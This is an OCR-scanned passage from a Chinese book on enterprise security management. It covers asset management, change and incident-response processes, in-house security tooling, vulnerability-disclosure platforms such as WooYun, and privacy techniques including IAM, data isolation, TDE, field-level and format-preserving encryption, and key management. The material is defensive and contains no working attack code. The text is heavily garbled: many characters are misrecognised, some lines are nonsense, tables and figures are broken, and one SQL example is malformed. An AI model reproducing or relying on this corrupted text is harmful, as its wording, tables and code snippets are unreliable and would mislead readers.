5) 整个 公司 或 至 少 业 务 线 级 别 的 周期 性 风险 评估 ， 主 要 用 于 识别 
新 的 风险 和 潜在 的 可 能 转 为 安全 事件 的 诱因 ， 以 此 审视 目前 的 安全 体 
系 中 坪 否 缺少 必要 的 目 检 环 节 。 


搞 清 组 织 中 一 共有 多 少 需要 纳入 安全 管理 范畴 的 资产 是 所 有 安全 
工作 的 基础 ， 否 则 补 了 东 墙 发 现 西 墙 还 有 个 窒 傣 ， 补 了 西 墙 发 现 北 面 


有 时 候 突然 发 现 一 个 机 天 被 入 侵 了 ， 碍 了 一 下 对 口 部 门 说 是 给 第 
三 方 合作 机 构 用 的 ， 所 以 没有 初始 安全 党 略 ， 也 没 预 装 安全 Agent， 但 
资产 分 发 的 时 候 因 为 是 业务 部 门 申请 的 ， 所 以 跟 这 个 部 门 的 其 他 机 器 
在 同一 个 内 网 ， 并 没有 做 隔离 ， 使 得 最 终 这 合 处 于 三 不 管 地 市 的 货 产 
成 了 入 侵 首 的 跳板 ， 长 驱 直 入 。 这 是 一 个 典型 的 由 于 资产 管理 不 民 导 
致 的 安全 事故 。 


资产 管理 的 好 坏 直接 反映 运 维 的 管理 能 力 ， 也 很 大 程度 上 会 影响 
安全 的 工作 ， 如 来 没有 一 登 好 的 资产 管理 手段 ， 安 全 工作 忌 会 处 在 百 
密 一 玖 的 亚 健康 状态 之 中 。 所 以 督促 相关 部 门 进行 有 效 的 资产 管理 并 
使 用 上 自动 化 的 手段 发 觉 资 产 的 变更 ， 是 运 维和 安全 部 门 共 同 需 要 考虑 
的 事情 ， 尤 其 在 资源 云 化 的 时 代 ， 资 产 管 理 钙 最 基础 的 要 求 。 


在 有 了 基础 的 资产 管理 以 后 ， 对 资产 做 分 类 分 级 ， 既 是 信息 安全 
的 需求 ， 也 是 BCM 的 基础 要 求 ， 同 时 隐私 保护 也 有 这 个 需求 。 


13.5.2 发布 和 变更 流程 


安全 管理 中 的 大 部 分 流程 在 任何 一 个 公司 都 不 会 独立 存在 ， 而 是 
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一 项 业务 对 外 开放 的 部 分 ， 在 对 内 保障 公司 目 身 的 安全 问题 上 绝 大 多 
数 都 可 以 当做 价值 链 的 一 个 风险 控制 环节 。 


对 互联 网 公司 而 言 ， 变 更 发 布 是 价值 通 中 器 据 最 大 量 的 工作 之 
一 ， 所 以 在 这 个 环 下 上 如 何 “ 卡 位 >， 图 13-4 簿 单 做 了 一 个 示例 ， 这 张 图 
并 不 是 正式 的 流程 ,仅仅 为 了 说 明 一 下 这 里 抛 出 的 问题 。 


主要 在 “设计 ”和 “交付 ”这 两 个 点 设计 ， 在 理论 篇 中 也 提 到 设计 阶段 
的 参与 是 根据 产品 轻重 程度 决定 的 。 设 计 比 较 好 理解 ， 包 括 架 构 级 的 
安全 ， 也 包括 诸如 《应 用 安全 开发 标准 》 这 类 事先 约定 的 规范 ， 也 可 
以 包括 输入 输出 校 验 这 种 编码 级 别 的 安全 标准 。 交 付 则 襄 括 安全 测 
试 、 发 布 前 过 一 轮 扫 朱 大 ， 以 及 事 爷 制定 的 应 急 预 案 。 


13.5.3 ”事件 处 理 流 程 


BP Sh Hi Ree SUK GT ECA in, RE Te BERET SPAY ATR 
火 还 是 一 项 PDCA 的 管理 措施 。 下 面 展示 一 个 事件 处 理 流 程 的 例子 。 


图 13-4 ”发 布 流程 示意 图 


1. 和 角色 定义 


重大 安全 运营 事故 响应 流程 中 涉及 的 角色 定义 如 下 : 


1) 联系 人 ”( 运 维 或 安全 ) : 例如 ， 白 天 工作 时 间 联 系 人 为 对 应 故 
障 系统 或 安全 事件 的 第 一 负责 人 ， 夜 晚 工作 时 间 可 能 是 监控 系统 的 运 
维 人 员 ， 他 负责 与 指挥 人 确认 事件 开始 处 理 、 并 与 客服 务 等 相关 职能 


进行 交互 ; 


2) 执行 者 ( 运 维 / 研 发 /安全 ) : 在 响应 过 程 中 ， 处 理 故 障 的 技术 


= 
0 


3) 指挥 人 (技术 体系 主要 负责 人 ) : 负责 响应 过 程 的 协调 、 决 策 
并 发 令 调度 的 人 员 (通常 约定 第 一 联系 人 为 张 三 ， 如 张 三 电话 不 可 
用 ， 则 依次 联系 李 四 、 王 五 ) 。 


2 定义 职责 是 隆 


对 应 急 啊 应 过 程 中 涉及 的 角色 职责 定义 如 表 13-3 所 示 。 


表 13-3 ”职责 矩阵 


客服 职能 联系 人 执行 者 指挥 人 

发 现 事故 R I I I 
回复 报 障 邮件 I R I I 
联系 指挥 人 及 执行 者 R I I 
E May iy TE I I I R 
排除 故障 过 程 R A 
切换 / 回 滚 R A 
确认 故障 解决 R e 

结束 通知 I I I R 
填写 工 单 G R I 
跟踪 监控 R R R 

回顾 响应 过 程 I R I 
汇报 管理 层 R I 


注 : 缩写 字母 意义 如 下 : 


R=Responsible， 负 责 执行 任务 的 角色 ， 具 体 负责 操 探 项目、 解决 


问题 。 


A=Accountable， 对 任务 负 全 责 的 角色 ， 只 有 经 其 同意 或 签署 之 
后 ， 项 目 才能 得 以 进行 。 


C=Consulted， 在 任务 实施 前 或 中 提供 指导 性 意见 的 人 员 。 
I=Informed， 及 时 被 通知 结果 的 人 员 ， 不 必 同 其 咨询 、 征 求 意见 
3. 尝 程 图 


全 运营 事故 的 啊 应 流程 如 图 13-5 所 示 。 


客户 服务 中 心 
(或 其 他 ) 


收 到 确认 Notes 
收 到 确认 Notes 督导 响应 过 程 
时 ， 应 进行 

半 小 时 轮 循 告警 


如 果 发 生变 更 ， 则 
需 遵 守 《 生 产 系统 
变更 流程 》 


进行 切换 / 回 深 


图 13-5 ”重大 安全 运营 事故 响应 流程 图 


在 安全 事件 的 处 理 方 法 上 应 遵循 PDCERF 模 型 以 及 NIST-800 中 所 定 
义 的 应 急 处 理 方法 。 


4. 系 统 天 联 影 啊 


在 应 急 处 理 时 容易 引发 忙中 错乱 ， 导 致 错 上 加 错 ， 所 以 SOA 服 务 
治理 、 接 口 间 调用 关系 和 数据 流 梳理 ， 般 套 引 用 关联 影响 反映 了 内 部 
治理 的 水 平 。 对 应 急事 件 处 理 来 说 ， 关 联 影响 分 析 属 于 P 阶 段 的 事前 准 
备 ， 周 期 的 日 常 工作 。 表 13-4 是 一 个 简单 的 示例 。 


表 13-4 系统 关联 影响 


系统 \ 项 目 SSO 影响 底层 服务 1 底层 服务 2 支付 系统 1 | ote 

a.company.com 是 
b.company.com 是 
c.company.com 是 
pa 县 
FE 
是 
是 

是 是 是 

A |= i i=} 

= FE qs 

是 是 是 

是 是 是 

B 目 . i=} 

Es FE ~ 


事件 处 理 流程 之 外 其 实 还 有 很 多 流程 ， 在 此 不 一 一 举例 。 


136 ”安全 产品 研发 


以 前 甲 方 安全 基本 不 涉及 这 个 话题 ， 在 互联 网 行业 崛起 后 ， 以 
Google 为 首 的 业界 领导 厂商 把 自己 的 方案 构建 于 目 研 系统 和 开源 软件 
之 上 ， 这 似乎 成 了 行业 的 交规 则 ， 不 目 己 开发 两 个 服务 器 软件 都 不 好 
意思 出 来 说 目 己 是 有 工程 技术 文化 的 公司 ， 不 目 己 开发 个 数据 库 都 不 
好 意思 说 目 己 是 大 厂 。 大 一 点 厂商 的 安全 团队 也 顺应 了 这 种 趋势 ， 根 
据 市 场 上 乙方 的 安全 产品 。 依 萌 卢 画 味 ， 把 原理 摸 请 楚 后 ， 导 找 相关 
的 开源 软件 ， 逐 渐 改 造成 使 用 分 布 式 染 构 的 安全 产品 。 一 开始 可 能 不 
如 商业 产品 好 用 ， 但 省 去 了 大 笔 的 软件 license 和 硬件 盒子 的 费用 ， 经 
过 多 年 的 不 断 改 民 和 实战 ， 慢 慢 束 不 再 把 商业 产品 当成 模仿 对 象 ， 开 
始 走 上 了 “业界 最 住 实践 ”之 路 。 


关于 是 否 有 必要 上 自 研 ， 业 界 各 种 说 法 不 一 ， 有 的 乙方 厂商 认为 甲 
方 专注 于 目 己 的 业务 就 好 ， 把 基础 的 部 分 交 给 乙方 去 做 。 互 联网 行业 
则 认为 如 果 google 用 IBM 〈 泛 指 IOE， 人 小 型 机 + 商业 数据 库 + 存 储 ) 的 解 
决 方案 会 破产 。 从 笔者 的 角度 看 ， 有 儿 个 方面 要 考虑 : 


:互联 网 公司 即便 十 很 大 的 厂商 也 不 可 能 选择 在 安全 方面 什么 都 目 
己 做 ， 比 如 拨 VPN 需 要 一 个 RSA 的 动态 令 脾 这 种 并 非 主 营 业务 ， 不 


AR, hie DSC, RRR — PIRR, KE 
没 必 要 目 己 做 。 


-规模 效应 决定 性 价 比 的 问题 。 打 算 目 研 某 个 安全 产品 一 定 是 应 用 
场景 履 兰 的 IT 资产 超过 某 个 数量 级 ， 这 样 所 花费 的 人 工 研 发 和 维护 的 
成 本 才 会 小 于 同等 数量 级 的 IT 资产 使 用 商业 解决 方案 时 采购 的 总 伦 
费 。 否 则 一 个 很 小 的 业务 ， 几 百 台 服务 硕 ， 花 了 10 人 小 团队 用 于 研发 
相关 的 安全 产品 吏 是 吃力 不 讨好 的 事 ， 研 发 团队 平均 2 万 工资 ， 加 税 和 
福利 公司 年 文 出 360 万 还 不 算 管 理 成 本 ， 业 务 调整 或 适 着 经 济 周期 还 要 
考虑 怎么 调整 甚至 裁员 补偿 。 国 内 超过 10 万 服务 需 规 模 的 互联 网 公司 
其 实 并 不 多 ， 花 1000 万 天 imperva 的 WAF 不 见得 古 个 错误 的 决定 ， 因 为 
目 己 研发 要 达到 同等 水 平 可 能 1000 万 也 搞 不 定 。 但 如 果 和 需求 吓 不 需要 
imperva WAF 如 此 多 的 功能 ， 只 需要 简单 的 过 滤 ， 那 束 可 以 考虑 用 开 
源 软 件 去 改 展 。 再 比如 IDC 规 模 几 万 台 物 理 服务 右 ， 但 是 Web 页 面 不 
多 ， 大 多 是 静态 货源 ， 入 口 集 中 ， 那 吏 没 必要 去 目 研 分 布 式 WAF， 天 
台 商 业 的 部 署 在 业务 前 端 承 行 了 ， 而 不 是 部 署 在 IDC 入 口 。 


.对 于 攻防 类 的 安全 产品 比较 容易 获得 通用 的 商业 解决 方案 ， 但 对 
于 风 控 类 的 产品 ， 由 于 跟 业 务 强 相 关 ， 几 乎 鲜 有 现成 的 解决 方案 ， 所 
以 风 控 侧 相 较 而 言 目 研 的 需求 和 必要 性 更 大 一 些 。 


13.7 RGE 


SRC 〈 安 全 应 急 啊 应 中 心 ) 只 是 一 个 形式 上 的 开端 ， 其 更 大 意义 
上 是 指 安全 工作 不 能 只 坐 在 办 公 室 里 香 练 内 功 ， 而 是 应 该 走出 去 寻求 
与 业界 广泛 的 合作 。 以 目前 互联 网 的 安全 态势 ， 没 有 一 家 公司 可 以 独 
SEH o AFAJLI H: 


与 乙方 安全 厂商 合作 ， 共 享 数据 和 威胁 情报 。 


.与 其 他 甲 方 公司 或 第 三 方 SRC 人 合作， 共享 威胁 情报 。 图 13-6 就 是 
国内 第 三 方 漏洞 平台 马云 


:与 供应 链 上 下 游 合 作 ， 使 安全 过 程 禾 盖 价 值 链 的 延伸 段 。 


-参与 业界 交流 ， 避 人 免 闭 门 造 车 。 


最 新 提交 (101) E 
提交 日 期 漏洞 名 称 评论 /关注 作者 
2015-10-11 。 位 宝 电脑 内 网 漫游 (100 多 万 员工 信息 以 及 大 呈 交 易 信 息 ) 5/6 路 人 甲 
2015-10-11 中 国联 通宝 视 通 业务 存在 多 个 参数 存在 SQL 注入 ( 涉及 9 个 数据 库 以 及 大 唱 的 数据 信息 可 被 泄漏 ) 0/0 路 人 甲 
2015-10-11 。 百度 文学 SQL 注入 0/8 PyNerd 
2015-10-11 。 企 智通 系列 上 网 行为 管理 设备 存在 两 处 任意 文件 过 历 & 敏 感 信息 泄漏 (都 无 需 登录 ) 0/2 YY-201... 
2015-10-11 中 国 石化 某 分 公司 监测 管理 系统 SQL 注入 漏洞 ( 可 getshell/DBA 权 限 / 泄 圳 加 油 站 负责 人 信息 ) 0/2 BAR 
2015-10-11 Sia SETS RA oraclejEst ( 涉及 300 家 旅行 社 /45 万 机 票 延 误 信 息 ) 0/0 路 人 甲 
最 新 确认 (1209) 
提交 日 期 漏洞 名 称 评论 /关注 作者 
2015-10-10 。 教育 部 强 推 超 级 应 用 IME 平 台 存在 未 授权 访问 核心 数据 库 湄 洞 ( 绕 过 数据 库 访问 边界 ) 13/44 五 道口 … 
2015-10-11 。 百度 浏览 器 缺陷 可 导致 BDUSS 泄 清 0/4 隐形 人 .…. 
2015-10-10 我 是 如 何 通 过 一 张 图片 shellPP 助 手 重要 站 点 并 接触 到 核心 数据 库 的 6/43 FAR... 
2015-10-10 。 橘子 浏览 器 远 程 代码 执行 11/21 梧桐 雨 
2015-10-10 百度 人 员 信 息 泄 震 可 导致 内 网 渗透 风险 (聊天 聊 到 优 衣 库 ) 15/47 Br... 
2015-10-01 ”天象 互 动 草 处 漏洞 进入 后 台 ( 千 万 用 户 信息 泄漏 /变更 游戏 下 载 地 址 /各 种 财务 信息 泄漏 ) 0/4 BAR 


图 13-6 ”国内 的 第 三 方 漏洞 平台 乌云 


第 14 章 ”隐私 保护 


隐私 保护 诞生 于 互联 网 时 代 ， 而 移动 互联 网 、 物 联网 发 展 起 来 后 
进一步 提升 了 这 方面 的 需求 ， 对 于 业务 规模 比较 大 的 公司 ， 尤 其 是 2C 
市 场 和 全 球 化 的 公司 ， 隐 私 保 护 成 了 安全 建设 中 的 必要 选项 。 


隐私 保护 近来 逐渐 兴起 主要 有 几 方 面 的 原因 : 


互联 网 和 移动 互联 网 兴起 ， 大 批 的 厂商 承载 了 上 亿 网 民 的 个 人 数 
据 ， 这 些 个 人 数据 的 洪 露 不 仅 影响 业务 运 香 ， 影 响 品 牌 ， 加 剧 用 户 流 
失 ， 实 际 上 在 立法 较 成 熟 的 国度 和 区 域 也 触 到 了 法 律 。 当 前 无 论 是 移 
动 互 联网 、 物 联网 ， 还 是 互联 网 +， 这 些 只 是 整个 人 类 社会 信息 化 程度 
加 深 的 中 途 片 段 ， 信 息 化 是 全 球 趋势 ， 所 以 从 这 个 层面 讲 ， 个 人 数据 
会 越 来 越 多 ， 承 载 个 人 数据 的 媒介 和 平台 会 越 来 越 多 ， 隐 私 剑 护 将 会 
发 展 成 为 和 信息 安全 同 级 别 的 热门 领域 ， 对 于 没有 搭 上 互联 网 这 波 的 
老牌 安全 从 业者 可 以 考虑 往 这 个 方向 转 。 


-国家 间 的 对 抗 从 实体 战争 发 展 成 网 络 信息 战 ， 维 度 不 同 了 ， 目 然 
更 重视 国家 的 数据 ， 从 欧盟 宣布 废弃 安全 港 协议 就 可 见 一 班 ， 美 国 商 
企 动 不 动 就 以 法 律 取证 等 各 种 借口 把 欧盟 成 员 国 公民 的 个 人 数据 搁 到 
美国 去 ， 各 国 大 佬 们 都 觉得 这 样 太 没 安 全 感 了 。 大 家 都 知道 数据 这 个 
东西 对 安全 和 情报 的 影响 太 大 了 ， 不 得 不 严肃 对 竺 。 


个 人 、 企 业 、 国 家 这 3 个 层次 决定 了 隐私 保护 的 重要 性 ， 对 于 互联 
网 企业 而 言 ， 隐 私 保护 在 业务 角度 有 如 下 诉求 : 


PES, ME, HE (玩家 ) 数据 泄露 ， 数 据 被 供应 商 和 分 包 
商 非法 倒卖 。 


:防止 信息 过 度 搜集 ， 以 及 在 用 户 不 知情 、 无 选择 权 的 情况 下 被 收 
集 和 存储 。 


.有 路 境 业务 时 ， 需 要 遵从 当地 的 合 规 性 要 求 ， 否 则 不 能 准 入 。 主 
要 是 按照 当地 的 管理 要 求 在 允许 的 拖 围 内 以 约定 的 方式 处 理 数 据 ， 璧 
如 由 客户 目 己 选 择 数 据 中 心 的 位 置 ， 合 同 结束 时 删除 数据 ， 在 数据 的 
生命 周期 内 给 客户 提供 查询 、 修 改 、 删 除数 据 的 接口 。 


: 跨 境 数 据 传输 需要 通过 专门 的 法 律 框 架 。 
.有 完整 的 安全 体系 和 技术 措施 保护 数据 。 
:设置 专职 的 隐私 保护 职位 (高 管 ) 。 
供应 链 上 下 游 环节 对 隐私 保护 的 芝 从 性 。 
-提供 审计 的 手段 。 


-法律 承 诺 ， 违 约 赔偿 和 违约 责任 。 


国内 的 互联 网 公司 在 业务 全 球 化 方面 的 进程 多 数 还 比较 低 ， 有 在 
海外 开展 业务 的 会 明显 感觉 到 隐私 保护 的 压力 。 图 14-1 是 ACT 29 欧 盟 
隐私 保护 法 案 ， 内 容 很 多 ， 需 要 学 习 。 
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you not wish that your correspondence, or the response of the Art. 29 WP, be published, in full or in part, either for reasons of business confidentiality, protection of 
personal data or other legitimate reason, please indicate in advance such reason/s, as wel! as the parts of the correspondence to which this applies. 


The Article 29 Data Protection Working Party was set up under the Directive 95/46/EC of the European 
Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing 
of personal data and on the free movement of such data. 


It has advisory status and acts independently 


Composition & Structure 


“The Article 29 Data Protection Working Party is composed of: 
。 a representative of the supervisory authority (ies) designated by each EU country; 
* a representative of the authority (ies) established for the EU institutions and bodies; 


* a representative of the European Commission. 


图 14-1 ACT 29 欧 盟 隐 私 保护 法 案 


隐私 傈 护 总 体 上 讲 并 不 是 一 个 偶 撤 术 话题 ， 不 过 下 面 只 打算 介绍 
一 些 跟 隐私 保护 相关 的 技术 。 对 于 企业 在 全 球 化 过 程 中 ， 隐 私 保护 应 
该 如 何 建立 体系 ， 笔 者 会 在 技术 博客 中 做 专题 剖析 。 


14.1 数据 分 类 


隐私 保护 强调 的 是 个 人 数据 PII (Personally Identifiable 
Information) ， 这 与 纯粹 的 服务 器 数据 保护 仍 有 差别 。 


在 安全 管理 中 强调 的 是 区 别 业 务 和 资产 权重 以 投入 不 同 的 成 本 做 
风险 控制 ，BCM 强 调 的 是 基于 不 同业 务 的 RTO 和 RPO 做 持续 性 管理 和 
业务 恢复 策略 ， 隐 私 保护 对 数据 分 类 的 要 求 更 细 ， 以 便 对 数据 的 全 生 
命 周 期 提供 不 同 的 保护 、 访 问 控制 和 加 密 策 略 。 


以 手机 的 云端 存储 为 例 ， 云 端 备份 数据 属于 非 结构 化 数据 ， 其 中 
通讯 未 、 竺 办 事项 等 属于 结构 化 数据 ， 它 们 的 保密 需求 相同 ， 但 是 技 
术 实 现 手段 可 能 整 不 一 样 。 


再 以 电 商 平台 账号 为 例 ， 用 户 名 ， 有 昵称 属于 公开 信息 ， 收 货 地 址 
属于 非 公开 信息 ， 而 文 付 卡 号 属于 机 密 信息 ， 他 们 都 古 结 构 化 数据 ， 
但 在 产品 设计 与 实现 的 时 候 需要 分 类 进行 保护 。 


从 更 高 维度 看 ， 很 多 企业 都 做 开放 平台 ， 通 过 API 把 数据 开放 给 
第 三 方 应 用 ， 里 面 就 涉及 更 抽象 的 数据 分 类 分 级 ， 对 供应 链 上 下 游 的 
数据 提取 痢 赋予 特定 的 访问 控制 策略 。 


14.2 访问 控制 

访问 控制 (Identity & Access Management，IAM) 示意 图 如 图 14-2 
所 示 。 

典型 的 IAM 应 该 包含 如 下 几 方 面 的 元 素 : 

1) 谁 (定义 角色 ) 

2) 对 哪些 资源 (定义 对 象 ) 

3) 拥有 (定义 “允许 ”还 是 “拒绝 ”) 

4) 哪些 具体 权限 《定义 增 删改 得 和 其 他 的 操作 |) 


5) 有 效 期 是 多 久 (定义 失效 时 间 ) 


Expire: 


015-12-31 A 


NS 


read, Wite 


\ 


Aj14-2 IAM 示意 图 


在 此 基础 上 还 可 以 继续 添加 : 组 策略 、 通 配 符 、 根 据 条 件 触发 或 
定义 访问 控制 策略 、 多 因素 认证 等 。 


143 ”数据 隅 离 


对 于 在 线 应 用 的 后 台数 据 存储 而 言 ， 敏 感 数据 (例如 用 户 库 、 口 
令 、 密 保 、 文 付 等 ) 应 考虑 分 表 分 库存 储 ， 应 尽量 减少 一 个 上 层 应 用 
出 现 漏洞 时 的 影响 ， 例 如 某 个 应 用 出 现 SQL 注 入 时 ， 它 应 该 只 能 影响 
那个 应 用 对 应 的 库 ， 而 不 是 全 部 的 数据 。 大 型 网 站 的 后 台数 据 存 储 几 
乎 都 是 分 片 的 (Sharding) ， 从 安全 上 应 考虑 敏感 数据 的 集中 存储 ， 过 
于 分 散会 加 大 监控 的 成 本 ， 因 为 “如 果 所 有 的 都 重要 那 束 等 于 没有 一 样 
苹 重 要 的 "， 如 图 14-3 所 示 。 


对 于 终端 设备 ， 应 考虑 沙 箱 级 隔离 (参见 图 14-4) ， 屏 蔽 非法 程序 
的 恶意 访问 ， 或 合法 程序 的 非 授权 越界 访问 (B) Appia Appt% 
个 人 数据 ) 。 容 器 本 身 使 用 TPM (可 信 计 算 ) 等 技术 。 


在 云 的 虚拟 化 环境 中 ， 一 般 情况 用 VPC 隔离 。 但 对 于 GovCloud 这 
种 保密 要 求 极 高 的 系统 也 采用 了 物理 隔离 。 物 理 隔 离 虽然 有 点 跟 云 计 
算 一 切 资 源 展 可 共享 的 理念 有 点 不 搭 调 ， 但 在 安全 上 却 是 真实 的 需 
求 。AWS 全 球 和 点 如 图 14-5 所 示 。 


应 用 服务 器 


型 互联 网 的 数据 库 分 上 


图 14-3 大 
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图 14-4 IOS 沙 箱 示意 图 


Global Amazon Web Services (AWS) Infrastructure 
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# - Zones 
i AWS Regions 
© AWS Edge Locations (CloudFront & Route 53) 


图 14-5 ” AWS 全 球 节 点 


14.4 数据 加 密 


对 于 结构 化 数据 ， 比 如 用 户 注册 的 号 份 证 号 、 信 用 卡 信息 在 持久 
化 时 需要 考虑 选择 性 字段 加 密 ， 目 前 可 以 使 用 的 技术 包括 TDE 
(Transparent Data Encryption， 透 明 数 据 加 密 ) 和 应 用 级 加 密 ， 对 于 非 
结构 化 数据 ， 例 如 ， 文 件 、 图 片 一 般 使 用 上 自 实现 的 文件 加 密 或 磁盘 块 
加 密 。 在 数据 传输 过 程 中 TLS 成 了 目前 事实 上 的 标准 。 


1.TDE 透 明 数 据 加 密 
TDE 的 原理 如 图 14-6 所 示 。 


TDE 可 对 数据 和 日 志文 件 执行 实时 IO 加 密 和 解密 ， 这 种 加 密使 用 
数据 库 加 密 密 钥 (DEK) ， 该 密 钥 存储 在 数据 库 引 导 记 杂 中 以 供 恢复 
时 使 用 。DEK 有 十 使 用 存储 在 服务 着 的 master 效 据 库 中 的 证 书 保护 的 对 称 
密 钥 ， 或 者 是 由 EKM (扩展 密 钥 管理 模块 ) 保护 的 非 对 称 密 钥 。TDE 
保护 对 象 为 静态 数据 (相对 于 内 存 中 的 热 数 据 而 言 ) ， 即 数据 和 日 志 
文件 。 开 发 人 员 可 以 使 用 AES 和 3DES 加 密 算法 来 加 密 数 据 ， 且 无 需 更 
改 现 有 的 应 用 程序 。 


Wallet 
(在 数据 库 外 ) ， 


Peso 


图 14-6 TDE 的 原理 图 


目前 只 有 Oracle 和 微软 的 SQL Server 支 持 TDE， 在 互联 网 行业 普遍 
流行 去 IOE 的 时 代 ，MySQL 是 实际 上 的 关系 型 数据 库 选 择 标准 ， 所 以 


TDE 将 会 有 一 定局 限 性 。 


2. 应 用 加 密 


对 于 大 部 分 使 用 MySQL 的 数据 库 ， 可 以 使 用 应 用 级 的 加 密 ， 例 如 
下 面 的 SQL 语句 : 


INSERT INTO Customers (CustomerFirstName, CustomerLastName) VALUES 
(AES_ENCRYPT( 'Ayazero',@key), AES _ENCRYPT('Ayaz3ro',@key); 


加 密 后 的 字段 不 支持 模糊 查询 ， 可 能 会 影响 应 用 的 正常 功能 和 程 
序 开发 ， 例 如 下 面 的 语句 可 能 就 不 行 了 : 


SELECT CustomerFirstName, CustomerLastName from Customers WHERE 
CustomerName LIKE 'Ay%';” 


直接 比较 的 语句 需要 变更 为 : 


SELECT CustomerFirstName，CustomerLastName FROM Customers WHERE 
CustomerFirstName = AES ENCRYPT('Ayazero', @key); 


在 设计 应 用 时 ， 例 如 打算 加 密 喘 份 证 了 字段， 可 以 使 用 HMAC-SHA1 
将 其 变 成 哈 硕 值 ， 加 密 后 的 状 仿 仍 然 旦 唯一 的 ， 与 其 他 人 的 身份 证 哈 
希 后 产生 的 值 一 样 的 概率 很 小 ， 查 询 时 根据 HMAC 的 哈 希 值 与 查询 字 
符 串 经 同样 哈 希 函数 处 理 后 的 值 对 比 ， 则 加 密 字 段 不 用 解密 。 


注 : google 已 宣布 2017 年 开始 不 再 支持 SHA-1 这 种 不 安全 的 算法 ， 
可 以 使 用 SHA-2 等 替代 算法 。 


3.FPE (保留 格式 加 密 ) 


传统 加 密 算 法 会 改变 原 明 文字 段 的 数据 长 度 和 数据 类 型 ， 而 FPE 
(保留 格式 加 密 ) 则 要 求 加 密 前 的 明文 与 加 密 后 的 密 文 拥 有 相同 数据 
长 度 和 数据 类 型 ， 其 原理 如 图 14-7 所 示 。 例 如 被 拖 库 后 ， 信 用 卡 卡号 字 
段 实际 上 是 加 密 的 ， 但 看 上 去 仍然 是 数字 明文 ， 且 长 度 与 正常 的 卡号 
一 致 ， 如 有 果 攻 击 者 拿 这 些 卡号 去 盗 刷 会 发 现 都 不 好 用 。FPE 不 仅 可 以 解 
决 敏感 数据 加 密 的 问题 ， 还 可 以 解决 将 生产 环境 数据 迁移 到 测试 环境 
叉 不 泄露 用 户 数 据 的 问题 ， 除 了 持久 化 数据 ，FPE 在 数据 传输 过 程 中 也 
一 样 可 以 使 用 。 
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图 14-7 FPE (保留 格式 加 密 ) 机 制 


CipherCloud 和 Voltage Security 是 写 AWS 合 作 的 两 家 数据 加 密 解 决 
方案 提供 商 ， 他 们 的 方案 都 文 持 FPE， 并 提供 了 一 种 近似 透明 的 数据 加 


密 方式 。FPE 在 数据 写 入 数据 库 实 例 之 前 对 原文 进行 加 密 或 符号 化 ， 同 
时 加 密 后 的 字段 插入 数据 库 原 字段 时 不 会 改变 表 的 数据 结构 。 


4. 文 件 /磁盘 加 密 


人 磁 副 文件 加 密 主要 是 针对 非 结 构 化 数据 ， 例 如 备份 文件 等 。 应 用 
本 身 不 需要 关注 加 密 过 程 ， 只 需要 将 文件 扔 到 加 密 存 储 介质 上 ， 高 性 
能 的 磁盘 加 密 一 般 都 通过 硬件 加 密 芯 片 实现 。 它 的 通病 古 一 旦 密 钥 泄 
种 束 会 失效 ， 表 14-1 古 对 儿 种 主流 加 秘方 式 的 对 比 。 


表 14-1 几 种 主流 加 密 方式 的 对 比 


分 类 Loop-AES | -E si | Truecrypt eCryptfs EncFs 
加 密 什么 整个 块 设备 文件 
存放 加 密 数 据 | ， 一 块 磁盘 或 磁盘 分 区 


现 有 文件 系统 中 的 一 个 目录 


的 容器 “一 个 文件 作为 一 个 虚拟 分 区 


和 文件 系统 的 | 比 文件 系统 更 底层 - 不 关心 是 加 密 的 是 一 个 块 设备 、 


在 现 有 文件 系统 上 添加 新 层 


关系 文件 系统 、 分 区 、LVM 卷 还 是 其 他 的 形式 

实现 机 理 通过 内 核 空间 用 户 态 (FUSE) 

Metadata 的 存 LUKS: LUKS 每 个 加 密 文件 | 容器 头 部 的 控 
储 位 置 Header 设备 的 开始 和 | 的 头 部 制 文件 中 

加 密 密 钥 存储 R-i 密 钥 文件 可 存 | 容器 头 部 的 控 
位 置 header 储 任 意 位 置 制 文件 中 


Apple 的 iCloud 中 对 个 人 备份 数据 上 传 没有 选择 上 述 加 密 方 式 ， 而 


征 目 己 现实 了 一 种 分 块 加 密 ， 如 岁 14-8 所 示 。 


其 原理 是 将 整个 备份 切割 成 4M 天 小 的 块 ， 分 别 加 密 每 个 块 ， 然 后 


保存 到 云端 ， 


它 的 好 处 是 ， 因 为 文件 本 身 已 加 密 ， 所 以 不 再 需要 第 三 


方 的 磁盘 级 加 密 ， 只 需要 存储 到 任意 的 非 加密 介 质 就 可 以 ， 例 如 亚 马 

还 S3 或 微软 Azure 等 平台 ， 因 为 密 钥 和 文件 加 密 的 元 数据 由 Apple 目 己 

保存 ， 所 以 把 数据 扔 到 第 三 方 存储 即使 是 被 人 下 载 了 也 无 法 解密 ， 分 

块 后 可 以 提高 上 传 的 并 发 性 能 同时 支持 断 点 续 传 ，Apple 本 身 只 保存 有 
限 的 数据 ， 而 把 大 量 的 存储 空间 负担 交 给 云 平台 ， 利 用 云 平台 的 资源 

弹性 伸缩 最 大 化 目 己 的 ROI， 人 否则 为 用 户 的 备份 数据 建立 海量 存储 是 一 
件 吃 力 不 讨 好 的 事 。 
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图 14-8 iPhone 手机 备份 使 用 分 块 加 密 


5.IR EEA 


上 面 的 方法 都 比较 “正统 ”， 正 统 的 方法 通用 性 强 ， 容 易 推动 开发 
去 实现 ， 但 是 对 攻击 者 来 说 获取 数据 的 途径 也 很 清晰 ， 那 就 是 拖 库 并 


获取 密 钥 。 在 对 抗 比较 激烈 的 场景 中 往往 需要 “ 守 正 出 奇 "， 需 要 一 


噪音 混 消 瓯 是 在 正常 的 用 户 数据 里 掺 入 “噪声 因 了 于 ”， 它 并 非 一 种 
加 密 算 法 〈 这 里 并 不 是 在 讨论 K 匿 名 、 差 分 之 类 的 话题 ) ， 而 是 变换 了 
形式 让 数据 不 再 以 原来 的 面貌 出 现 。 这 种 思路 跟 代 码 宴 清 如 出 一 入 ， 
对 抗 的 效果 上 比较 依赖 于 信息 不 对 称 ， 一 旦 信息 不 对 称 被 打破 ， 束 会 
失效 。 


14.5 ZHE 


密 钥 是 所 有 加 密 过 程 的 “SSO”， 是 最 大 的 单 点 问题 ， 所 以 密 钥 本 
身 的 存储 和 管理 可 能 比 具体 怎么 加 密 更 重要 ， 而 一 旦 密 钥 丢失 ， 所 有 
的 数据 将 不 可 找 回 。 


如 图 14-9 所 示 ， 密 钥 管 理 基础 设施 (KMI) 通常 分 两 部 分 : 密 钥 
的 存储 ， 对 密 钥 本 身 的 访问 授权 管理 。 更 上 层 的 加 密 方法 通常 由 应 用 
上 自身 去 实现 。 


图 14-9 ”分 层 的 KMI 架 构 


